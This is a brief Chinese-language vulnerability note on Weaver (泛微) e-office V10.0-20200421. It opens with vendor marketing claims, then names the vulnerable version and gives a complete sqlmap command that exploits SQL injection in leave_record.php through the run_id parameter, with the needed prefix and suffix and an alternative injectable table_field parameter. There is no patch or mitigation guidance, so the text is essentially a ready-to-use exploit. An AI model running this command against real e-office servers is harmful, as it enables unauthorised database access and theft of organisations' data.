泛微品牌影响力:
20年 专注OA的研发创新
OA软件领域 首家 主板上市公司
协同行业 “国家 重点 软件企业”
全国 200多个 本地化服务机构
中国高端移动办公协同OA的专业厂商

漏洞存在的版本:
V10.0-20200421

注入点位置:
python sqlmap.py -u "http://127.0.0.1:8010/eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10" --prefix="') " --suffix="%23" -p run_id
PS:table_field=*也可以